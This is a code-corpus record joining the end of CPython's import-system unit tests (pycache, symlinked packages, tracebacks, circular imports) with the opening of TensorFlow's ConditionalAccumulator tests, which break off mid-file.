func_filename = func.__code__.co_filename
"""
dir_name = os.path.abspath(TESTFN)
file_name = os.path.join(dir_name, module_name) + os.extsep + "py"
compiled_name = importlib.util.cache_from_source(file_name)
def setUp(self):
self.sys_path = sys.path[:]
self.orig_module = sys.modules.pop(self.module_name, None)
os.mkdir(self.dir_name)
with open(self.file_name, "w") as f:
f.write(self.module_source)
sys.path.insert(0, self.dir_name)
importlib.invalidate_caches()
def tearDown(self):
sys.path[:] = self.sys_path
if self.orig_module is not None:
sys.modules[self.module_name] = self.orig_module
else:
unload(self.module_name)
unlink(self.file_name)
unlink(self.compiled_name)
rmtree(self.dir_name)
def import_module(self):
ns = globals()
__import__(self.module_name, ns, ns)
return sys.modules[self.module_name]
def test_basics(self):
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
del sys.modules[self.module_name]
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_incorrect_code_name(self):
py_compile.compile(self.file_name, dfile="another_module.py")
mod = self.import_module()
self.assertEqual(mod.module_filename, self.file_name)
self.assertEqual(mod.code_filename, self.file_name)
self.assertEqual(mod.func_filename, self.file_name)
def test_module_without_source(self):
target = "another_module.py"
py_compile.compile(self.file_name, dfile=target)
os.remove(self.file_name)
pyc_file = make_legacy_pyc(self.file_name)
importlib.invalidate_caches()
mod = self.import_module()
self.assertEqual(mod.module_filename, pyc_file)
self.assertEqual(mod.code_filename, target)
self.assertEqual(mod.func_filename, target)
def test_foreign_code(self):
py_compile.compile(self.file_name)
with open(self.compiled_name, "rb") as f:
header = f.read(12)
code = marshal.load(f)
constants = list(code.co_consts)
foreign_code = importlib.import_module.__code__
pos = constants.index(1)
constants[pos] = foreign_code
code = type(code)(code.co_argcount, code.co_kwonlyargcount,
code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, tuple(constants),
code.co_names, code.co_varnames, code.co_filename,
code.co_name, code.co_firstlineno, code.co_lnotab,
code.co_freevars, code.co_cellvars)
with open(self.compiled_name, "wb") as f:
f.write(header)
marshal.dump(code, f)
mod = self.import_module()
self.assertEqual(mod.constant.co_filename, foreign_code.co_filename)
class PathsTests(unittest.TestCase):
SAMPLES = ('test', 'test\u00e4\u00f6\u00fc\u00df', 'test\u00e9\u00e8',
'test\u00b0\u00b3\u00b2')
path = TESTFN
def setUp(self):
os.mkdir(self.path)
self.syspath = sys.path[:]
def tearDown(self):
rmtree(self.path)
sys.path[:] = self.syspath
# Regression test for http://bugs.python.org/issue1293.
def test_trailing_slash(self):
with open(os.path.join(self.path, 'test_trailing_slash.py'), 'w') as f:
f.write("testdata = 'test_trailing_slash'")
sys.path.append(self.path+'/')
mod = __import__("test_trailing_slash")
self.assertEqual(mod.testdata, 'test_trailing_slash')
unload("test_trailing_slash")
# Regression test for http://bugs.python.org/issue3677.
@unittest.skipUnless(sys.platform == 'win32', 'Windows-specific')
def test_UNC_path(self):
with open(os.path.join(self.path, 'test_unc_path.py'), 'w') as f:
f.write("testdata = 'test_unc_path'")
importlib.invalidate_caches()
# Create the UNC path, like \\myhost\c$\foo\bar.
path = os.path.abspath(self.path)
import socket
hn = socket.gethostname()
drive = path[0]
unc = "\\\\%s\\%s$"%(hn, drive)
unc += path[2:]
try:
os.listdir(unc)
except OSError as e:
if e.errno in (errno.EPERM, errno.EACCES, errno.ENOENT):
# See issue #15338
self.skipTest("cannot access administrative share %r" % (unc,))
raise
sys.path.insert(0, unc)
try:
mod = __import__("test_unc_path")
except ImportError as e:
self.fail("could not import 'test_unc_path' from %r: %r"
% (unc, e))
self.assertEqual(mod.testdata, 'test_unc_path')
self.assertTrue(mod.__file__.startswith(unc), mod.__file__)
unload("test_unc_path")
class RelativeImportTests(unittest.TestCase):
def tearDown(self):
unload("test.relimport")
setUp = tearDown
def test_relimport_star(self):
# This will import * from .test_import.
from .. import relimport
self.assertTrue(hasattr(relimport, "RelativeImportTests"))
def test_issue3221(self):
# Note for mergers: the 'absolute' tests from the 2.x branch
# are missing in Py3k because implicit relative imports are
# a thing of the past
#
# Regression test for http://bugs.python.org/issue3221.
def check_relative():
exec("from . import relimport", ns)
# Check relative import OK with __package__ and __name__ correct
ns = dict(__package__='test', __name__='test.notarealmodule')
check_relative()
# Check relative import OK with only __name__ wrong
ns = dict(__package__='test', __name__='notarealpkg.notarealmodule')
check_relative()
# Check relative import fails with only __package__ wrong
ns = dict(__package__='foo', __name__='test.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with __package__ and __name__ wrong
ns = dict(__package__='foo', __name__='notarealpkg.notarealmodule')
self.assertRaises(ModuleNotFoundError, check_relative)
# Check relative import fails with package set to a non-string
ns = dict(__package__=object())
self.assertRaises(TypeError, check_relative)
def test_absolute_import_without_future(self):
# If explicit relative import syntax is used, then do not try
# to perform an absolute import in the face of failure.
# Issue #7902.
with self.assertRaises(ImportError):
from .os import sep
self.fail("explicit relative import triggered an "
"implicit absolute import")
def test_import_from_non_package(self):
path = os.path.join(os.path.dirname(__file__), 'data', 'package2')
with uncache('submodule1', 'submodule2'), DirsOnSysPath(path):
with self.assertRaises(ImportError):
import submodule1
self.assertNotIn('submodule1', sys.modules)
self.assertNotIn('submodule2', sys.modules)
def test_import_from_unloaded_package(self):
with uncache('package2', 'package2.submodule1', 'package2.submodule2'), \
DirsOnSysPath(os.path.join(os.path.dirname(__file__), 'data')):
import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
conditional_accumulator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
# from functools import reduce
class ConditionalAccumulatorTest(tf.test.TestCase):
def testConstructor(self):
with tf.Graph().as_default():
q = tf.ConditionalAccumulator(tf.float32, name="Q")
self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.accumulator_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'ConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { unknown_rank: true} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.accumulator_ref.op.node_def)
def testConstructorWithShape(self):
with tf.Graph().as_default():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1, 5, 2, 8]))
self.assertTrue(isinstance(q.accumulator_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.accumulator_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'ConditionalAccumulator'
attr { key: 'dtype' value { type: DT_FLOAT } }
attr { key: 'shape' value { shape { dim {size: 1 }
dim {size: 5 }
dim {size: 2 }
dim {size: 8 }
} } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.accumulator_ref.op.node_def)
def testAccumulatorSizeEmpty(self):
with self.test_session():
q = tf.ConditionalAccumulator(tf.float32, name="Q")
self.assertEqual(q.num_accumulated().eval(), 0)
def testAccumulatorSetGlobalStep(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
set_global_step_op = q.set_global_step(1)
set_global_step_op.run()
def testAccumulatorApplyGradFloat32(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
accum_op.run()
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float16, tf.float32, tf.float64]
for i in range(len(dtypes)):
dtype = dtypes[i]
q = tf.ConditionalAccumulator(dtype, shape=tf.TensorShape([1]))
elems = np.arange(10).astype(dtype.as_numpy_dtype)
for e in elems:
q.apply_grad((e,)).run()
result = sess.run(q.take_grad(1))
self.assertEqual(sum(elems) / len(elems), result)
def testAccumulatorMultipleAccumulators(self):
with self.test_session():
q_f32_0 = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
q_f32_1 = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
q_f16_0 = tf.ConditionalAccumulator(
tf.float16, name="Q", shape=tf.TensorShape([1]))
q_f16_1 = tf.ConditionalAccumulator(
tf.float16, name="Q", shape=tf.TensorShape([1]))
accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
for i in range(len(accums)):
accums[i].apply_grad((i + 10.0,)).run()
for i in range(len(accums)):
result = accums[i].take_grad(1).eval()
self.assertEqual(result, i + 10.0)
def testAccumulatorApplyAndTakeGradWithShape(self):
with self.test_session():
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(x, y)]
for x, y in zip(elems[0], elems[1])]
accum_ops = [q.apply_grad(x) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
is_all_equal = True
val = takeg_t.eval()
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
def testAccumulatorApplyGradWithWrongShape(self):
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=(3, 2))
with self.assertRaises(ValueError):
q.apply_grad([[1.0, 2.0], [3.0, 4.0]])
with self.assertRaises(ValueError):
q.apply_grad([[1.0], [2.0], [3.0]])
def testAccumulatorDynamicShape(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
x = tf.placeholder(tf.float32)
accum_op = q.apply_grad(x)
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(c, d)]
for c, d in zip(elems[0], elems[1])]
takeg_t = q.take_grad(1)
for elem in elems:
sess.run(accum_op, feed_dict={x: elem})
is_all_equal = True
val = takeg_t.eval()
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
def testAccumulatorWrongDynamicShape(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(tf.float32, name="Q", shape=None)
x = tf.placeholder(tf.float32)
accum_op = q.apply_grad(x)
# First successful apply_grad determines shape
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]})
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0]]})
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0], [2.0], [3.0]]})
def testAccumulatorSizeAfterApplyGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
def testAccumulatorSizeAfterApplyGradAndTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
extract_t = q.take_grad(2)
# Applying gradient multiple times to increase size from 0 to 2.
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
# Extract will reduce size to 0
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
# Take gradients always sets the size back to 0 if successful.
accum_op = q.apply_grad((10.0,), local_step=1)
accum_op.run()
accum_op.run()
accum_op.run()
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 4)
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
def testAccumulatorTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(tf.constant(1))
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
def testAccumulatorInvalidTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
accum_ops = [q.apply_grad((x,)) for x in elems]
takeg_t = q.take_grad(-1)
for accum_op in accum_ops:
accum_op.run()
with self.assertRaises(tf.errors.InvalidArgumentError):
takeg_t.eval()
def testAccumulatorRepeatedTakeGrad(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave, val)
elems = [20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = takeg_t.eval()
self.assertEqual(elems_ave + 0.0, val)
def testAccumulatorIncrementGlobalStep(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
global_step = tf.Variable(0, name="global_step")
new_global_step = tf.add(global_step, 1)
inc_global_step = tf.assign(global_step, new_global_step)
set_global_step_op = q.set_global_step(new_global_step)
tf.global_variables_initializer().run()
for _ in range(3):
set_global_step_op.run()
inc_global_step.eval()
def testAccumulatorSetGlobalStepPreventsAccumulation(self):
with self.test_session():
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
local_steps = range(1000, 1005)
accum_ops = [q.apply_grad((0.0 + x,), local_step=x) for x in local_steps]
for ls in local_steps:
set_global_step_op = q.set_global_step(ls)
set_global_step_op.run()
for accum_op in accum_ops:
accum_op.run()
takeg_t = q.take_grad(1)
val = takeg_t.eval()
self.assertEqual(0.0 + sum(x for x in local_steps
if x >= ls) / sum(1 for x in local_steps
if x >= ls), val)
def testParallelApplyGrad(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
def apply_grad(accum_op):
sess.run(accum_op)
threads = [self.checkedThread(
target=apply_grad, args=(o,)) for o in accum_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = takeg_t.eval()
self.assertEqual(val, sum(elems) / len(elems))
def testParallelTakeGrad(self):
with self.test_session() as sess:
q = tf.ConditionalAccumulator(
tf.float32, name="Q", shape=tf.TensorShape([1]))
elems = [e for e in range(10)]
